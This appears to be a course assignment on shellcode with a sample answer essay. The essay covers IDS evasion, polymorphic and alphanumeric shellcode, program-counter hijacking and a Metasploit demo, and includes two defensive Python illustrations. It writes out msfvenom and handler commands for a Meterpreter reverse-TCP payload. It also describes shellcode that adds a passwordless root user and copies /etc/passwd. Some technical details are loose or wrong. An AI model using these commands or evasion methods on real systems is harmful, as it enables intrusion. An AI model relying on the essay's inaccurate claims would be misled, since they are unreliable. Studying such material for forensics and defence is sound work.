“Evasion Techniques”
“English Shellcode”
2. Read the paper “Evasion Techniques”, and explain how a piece of shellcode can bypass an intrusion detection system. more information about the shellcode issues related to computer forensic investigations
3. Read the paper “English Shellcode”, explain the concept of program counter and its importance to an attacker who uses shellcodes.
4. In the paper “English Shellcode”, what are the two advantages of using alphanumeric encoding engines to generate shellcode?
Part B
2. Your program should demand at least two user attempts of inputting the passwords. That is, your program should only terminate when the user has entered two identical passwords.
3. Your program should store the username and password pair into a text file called user.dat in the current directory.
4. You should package your C code into a shellcode by using Shellforge
Part C
You need to write an essay to demonstrate your level of understanding about shellcode and its application on hacking platforms, operating systems vulnerability, penetration testing and exploitation. Your essay should consist of the following parts:
1. List and explain every command used in the metasploit demo.
2. Identify the name of the shellcode used in the demo, reproduce its contents in hex and provide a screen capture of it in your essay, and explain what this shellcode is capable of doing.
3. Find and list at least five different shellcode-generating approaches. Then compare their advantages and disadvantages from the viewpoint of attackers.
4. Describe the concept of polymorphic shellcode, and discuss the impact of misusing penetration toolkits such as Metasploit for malicious purposes.
Shellcode can be defined as a sequence of instructions for the processor that is injected into, and then executed by, an exploited program. Shellcode is used to directly manipulate registers and the functionality of a compromised application [4]. Shellcode can be written in high-level programming languages, but in certain situations the resulting code may not work as intended, so low-level assembly language is favoured for shellcode generation.
For any exploitation, the baseline of an attack is the severity of the flaws in the application or network gateway that is going to be exploited [4]. The impact of an exploitation-based attack depends on successfully exploiting the discovered vulnerability, and a detailed vulnerability scan of the targeted machine or application helps the attack succeed.
The three main components of any exploitation attack are the vector used for the attack, the technique used for the exploitation and the payload chosen for the attack.
Attack vector: An attack vector is the technique or means by which an attacker gains access to a targeted computer or network. Through it the attacker delivers a specific payload or malicious code segment. Attack vectors let attackers exploit the vulnerabilities they have scanned for in a system or network server.
Attack vectors include shellcode, e-mail attachments, viruses, pop-up windows, chat rooms, instant messages and so on. Most of these vectors are software components, or in some cases hardware components. In exploitation attacks, users are deceived and system vulnerabilities are exploited using components such as shellcode.
To some extent, antivirus and firewall applications are able to block some attack vectors from reaching the system or network [5]. A defence that is effective against exploitation attacks for some time may not remain effective forever, because attackers constantly change and update their vectors with new techniques in order to gain unauthorized access to targeted servers, networks or workstations inside the network.
Technique used for exploitation:
Payload for the attack: The exploit payload is the functional component of any exploitation-based attack. Payloads usually include bind shells, reverse shells or the Meterpreter shell. In an exploitation attack, the payload is the part of the virus, malware or worm that is responsible for carrying out the malicious action on the victim machine or network.
Three types of payload are used in attacks: stagers, stages and singles.
Stagers: These payloads are small in size and are mainly intended to establish communication between the victim machine and the attacker machine. Once communication is established, the process moves to the next stage. The communication channel established between the attacker and target machine is very reliable. This kind of payload lets attackers re-use code developed for an attack [1], because establishing the communication channel is separated from the actual attack stage.
Stages: These payload modules are downloaded by the stager. Because the stager takes care of the communication channel, stage payloads are often larger and offer various options for delivering the payload and carrying out the chosen action.
Singles: These payloads are self-contained and are not connected to any other module. Their main purpose is establishing communication between the victim machine and the attacker machine using Metasploit [3].
Exploitation technique: The attack algorithm is known as the exploitation technique used in the attack on the vulnerability.
Most intrusion detection systems depend on pre-defined signatures of different malware, shellcode or viruses [4]. One of the best-known and most popular methods of evading an IDS is the use of polymorphic shellcode. Polymorphism is a strategy that transforms the malicious code so that it is represented differently and uniquely each time it is run, yet it still works in the same manner as it did before the transformation.
With polymorphism, attackers avoid IDS detection because the IDS tries to match its predefined signatures, and those signatures no longer match the shellcode after its transformation [1]. Polymorphic engines are used to create polymorphic shellcode.
In computing, the program counter is a special register that keeps track of the next instruction of an application to be executed by the processing unit.
Both data and application instructions have addresses in the system's memory. Instructions are fetched from the memory location held by the program counter and then executed in turn by the processing unit.
When the processing unit executes an instruction, the program counter is updated with the address of the instruction that will be fetched from memory and executed next [4]. In the following stage the program counter sends that address to the memory address register as part of the execution cycle. In this way the program counter increments by one for the next operation.
Attackers can exploit a vulnerability in the targeted machine or server through control-flow hijacking [2]. In this process the attacker gains control over the program counter and redirects the flow of instruction execution so that the targeted machine or server performs the attacker's desired action.
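The fetch-execute cycle and the hijacking of the program counter described above can be made concrete with a toy machine. The code below is an added illustration written for this essay, not from the cited papers: a simulated program counter, a corruptible stack of saved return addresses, and an optional shadow-stack check (a defensive technique the essay does not name; the instruction set, addresses and register names are all constructed) that refuses a return whose target no longer matches the saved address.

```python
class ToyMachine:
    """Fetch-execute loop with an explicit program counter (pc). Instructions:
    ("mov", reg, imm), ("call", addr), ("ret",), ("halt",); one per address."""

    def __init__(self, program, shadow_stack=False):
        self.mem = list(program)
        self.pc = 0                    # address of the NEXT instruction to fetch
        self.regs = {"a": 0, "b": 0}
        self.stack = []                # saved return addresses, corruptible like a real stack
        self.shadow = []               # protected copy, checked only when shadow_stack is on
        self.use_shadow = shadow_stack

    def step(self):
        op, *args = self.mem[self.pc]  # fetch the instruction the pc points at
        self.pc += 1                   # pc now names the following instruction
        if op == "mov":
            self.regs[args[0]] = args[1]
        elif op == "call":             # save the resume address, then redirect the pc
            self.stack.append(self.pc)
            self.shadow.append(self.pc)
            self.pc = args[0]
        elif op == "ret":              # load the pc back from the saved address
            target, expected = self.stack.pop(), self.shadow.pop()
            if self.use_shadow and target != expected:
                raise RuntimeError(f"ret to {target}, shadow stack expected {expected}")
            self.pc = target
        elif op == "halt":
            return False
        return True

    def run(self, max_steps=50):
        while max_steps and self.step():
            max_steps -= 1
        return self.regs["a"]


# Constructed program: main (0-2) calls helper (3-4); routine at 5 is never called.
PROGRAM = [("mov", "a", 1), ("call", 3), ("halt",),
           ("mov", "b", 10), ("ret",), ("mov", "a", 999), ("halt",)]


def run_hijacked(shadow_stack=False):
    m = ToyMachine(PROGRAM, shadow_stack=shadow_stack)
    m.step(); m.step()        # after 'call', saved return address 2 is on the stack
    m.stack[-1] = 5           # model a memory-corruption overwrite of that saved address
    try:
        return m.run()        # unchecked, 'ret' loads 5 into the pc and a becomes 999
    except RuntimeError:
        return "blocked"      # the shadow-stack check refused the corrupted return
```

Running `ToyMachine(PROGRAM).run()` returns 1, because the helper returns to address 2 and halts; only when the saved address is corrupted does the pc reach the routine at 5.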
The advantages of using an alphanumeric engine to generate shellcode, compared with other engines, are as follows.
- First, alphanumeric shellcode generated by an alphanumeric engine can be stored in generally unsuspected contexts and atypical formats, for example as valid directory and file names or as user passwords on a system. Moreover, the alphanumeric character set is much smaller than the character sets available in UTF-8 and Unicode encodings [2]. This implies that the set of byte values making up alphanumeric shellcode is far smaller than that of the ordinary shellcode injected into an application or network.
- Shellcode generated by alphanumeric engines helps avoid monitoring tools (intrusion prevention and intrusion detection systems) [5]. These tools detect malware or worms by matching certain signatures, and alphanumeric shellcode lacks those signatures, so the tools fail to detect it.
Identification: This shellcode creates a root-privileged user in a Linux system with the user name r00t and no password. The new entry is written to the /etc/passwd file.
Identification: This shellcode copies all of the data in the /etc/passwd file to /tmp/outfile. In this way the attacker gains easier access to all the user accounts, because the account data is stored in the output file, which the attacker can then exploit.
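The identification of the two shellcodes above relies on recovering the strings they build on the stack and the system calls they issue. The triage helper below is an added example written for this essay (not from the cited papers or any tool named here): it sweeps 32-bit x86 bytes for runs of `push imm32`, recovers the pushed strings, counts `int 0x80` gates, and reports the byte-class profile (NULL-free, printable, alphanumeric) that the filters discussed in the alphanumeric-shellcode section would look at. The sample bytes are constructed for the example, not the essay's hex dumps.

```python
PUSH_IMM32 = 0x68          # x86 'push imm32': the usual way shellcode builds strings
INT_80 = b"\xcd\x80"       # 'int 0x80': 32-bit Linux system-call gate


def byte_profile(code: bytes) -> dict:
    """Character-class facts that NULL-byte, printable-only or alphanumeric
    filters rely on; alphanumeric shellcode satisfies all three."""
    return {
        "length": len(code),
        "null_bytes": code.count(0),
        "all_printable": all(0x20 <= b < 0x7F for b in code),
        "all_alnum": all(b < 0x80 and chr(b).isalnum() for b in code),
    }


def recover_pushed_strings(code: bytes) -> list:
    """Linear sweep for runs of 'push imm32' whose immediates are printable.
    Consecutive pushes build a string on the stack with the last push at the
    lowest address, so each run is reversed before joining. A linear sweep can
    misread immediates as opcodes, so treat the output as a triage hint."""
    strings, run, i = [], [], 0
    while i < len(code):
        if code[i] == PUSH_IMM32 and i + 4 < len(code):
            imm = code[i + 1:i + 5]
            if all(0x20 <= b < 0x7F for b in imm):
                run.append(imm.decode("ascii"))
                i += 5
                continue
        if run:                       # a non-push byte ends the current run
            strings.append("".join(reversed(run)))
            run = []
        i += 1
    if run:
        strings.append("".join(reversed(run)))
    return strings


def triage(code: bytes) -> dict:
    """Combine the byte profile, the syscall count and the recovered strings."""
    report = byte_profile(code)
    report["syscalls"] = code.count(INT_80)
    report["strings"] = recover_pushed_strings(code)
    return report


# Constructed sample (not the essay's dump): push 5; pop eax; xor ecx,ecx;
# push ecx; push "file"; push "/out"; push "/tmp"; mov ebx,esp; int 0x80.
SAMPLE = (b"\x6a\x05\x58\x31\xc9\x51"
          b"\x68file\x68/out\x68/tmp"
          b"\x89\xe3\xcd\x80")

if __name__ == "__main__":
    print(triage(SAMPLE))   # strings == ['/tmp/outfile'], syscalls == 1
```

A report with `null_bytes == 0` and `all_printable == True` is exactly the shape a printable-only filter passes, which is why such filters cannot be relied on as the only detection.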
The first command used is “msfconsole”, which opens the Metasploit console. After that, the “show exploits” command lists the exploits available for attacking any kind of machine.
In the provided attack, “metasploit/multi/handler” is used by the attacker to create and establish the connection to the victim machine. After that, “set PAYLOAD windows/meterpreter/reverse_tcp” sets the payload for the attack. The following command, “msfvenom -p windows/meterpreter/reverse_tcp LHOST address”, generates the payload that communicates between victim and attacker on the specific port assigned for the payload. In this process LHOST is the IP address of the given machine. Since both machines are on the same network, the target machine is able to reach the attacker's handler. The next step is SET LPORT: the port on which the victim machine connects back once the target has established a connection with the machine [4]. The next stage is the backdoor file for the Windows machine, which is delivered by enclosing it with a proper password and message.
For the provided attack, reverse shellcode can be used to exploit the target. A reverse shell is a type of shell in which the target machine connects back to the attacking machine. The attacking machine opens the port with which it is associated and uses it to run the various commands that need to be completed.
There are a large number of methods used for generating shellcode. A list is provided below:
PWNtools: This is considered an essential part of the CTF toolset. It is an exploit-development library for any given framework. The tool is written in Python and is designed to provide rapid development and prototyping [2]. It offers many features, but here it is only used for generating shellcode. The module aims to produce assembly code, which it achieves through NASM, driven from Python [1]. PWNtools does not require the attacker to know assembly in order to create a shell. Different applications provide tools that help write shellcode in a much better and faster way.
NASM: This is the most basic approach to generating shellcode. It creates shellcode from hand-written assembly code.
Shellforge: This is written in Python and is able to build shellcode from C programs.
Synesthesia approach: Compared with the other approaches, this one is the most recent. It imposes the following restrictions, which make the shellcode more capable of hiding from the different monitoring tools [3]. The constraints of this approach are:
No NULL bytes are allowed in the shellcode, and every ASCII letter is converted to upper case. To make the shellcode more reliable, the technique is also applied to format strings, where using the “%” character is dicey.
All bytes in the shellcode must be printable (or even alphanumeric) in order to escape the IDS.
Use of msfvenom: Another popular approach to generating shellcode is msfvenom, available from the Metasploit platform. Shellcode developed with this approach includes only ASCII characters for use in the exploitation.
The benefit of this solution is that nothing has to be written by hand; the predefined shellcodes for each platform can be used. For NASM, the biggest disadvantage is that the tool is not useful for generating shellcode for other platforms such as Android.
Polymorphism is a well-known technique that encodes the shellcode responsible for exploiting a vulnerability into a polymorphic structure. Signature-based tools identify shellcode by known signatures, and polymorphism is considered the best technique for defeating this [5]. An attacker can scramble or pack the shellcode and then prepend a small piece of code that decompresses it within the exploit. Because the shellcode's signature is not visible in its polymorphic form, the IPS can easily fail to detect it.
[1] J. Mason, S. Small, F. Monrose and G. MacManus, "English shellcode", in Proceedings of the 16th ACM Conference on Computer and Communications Security, pp. 524-533, 2009.
[2] T. Cheng, Y. Lin, Y. Lai and P. Lin, "Evasion Techniques: Sneaking through Your Intrusion Detection/Prevention Systems", IEEE Communications Surveys & Tutorials, vol. 14, no. 4, pp. 1011-1020, 2012.
[3] K. Iwamoto and K. Wasaki, "A Method for Shellcode Extraction from Malicious Document Files Using Entropy and Emulation", International Journal of Engineering and Technology, vol. 8, no. 2, pp. 101-106, 2016.
[4] T. Okamoto, "SecondDEP: Resilient Computing that Prevents Shellcode Execution in Cyber-Attacks", Procedia Computer Science, vol. 60, pp. 691-699, 2015.
[5] M. Chen, C. Hu, D. Tian, X. Wang, Y. Liu and N. Li, "Shellix: An Efficient Approach for Shellcode Detection", International Journal of Security and Its Applications, vol. 10, no. 6, pp. 107-122, 2016.
[6] T. Lu, L. Zhang and Y. Fu, "A Novel Immune-Inspired Shellcode Detection Algorithm Based on Hyperellipsoid Detectors", Security and Communication Networks, vol. 2018, pp. 1-10, 2018.
[7] I. Arce, "The shellcode generation", IEEE Security & Privacy Magazine, vol. 2, no. 5, pp. 72-76, 2004.
My Assignment Help. (2021). Understanding Shellcode And Its Application In Hacking Platforms. Retrieved from https://myassignmenthelp.com/free-samples/sit703-advanced-digital-forensics/use-of-shellcode-in-digital-forensics.html.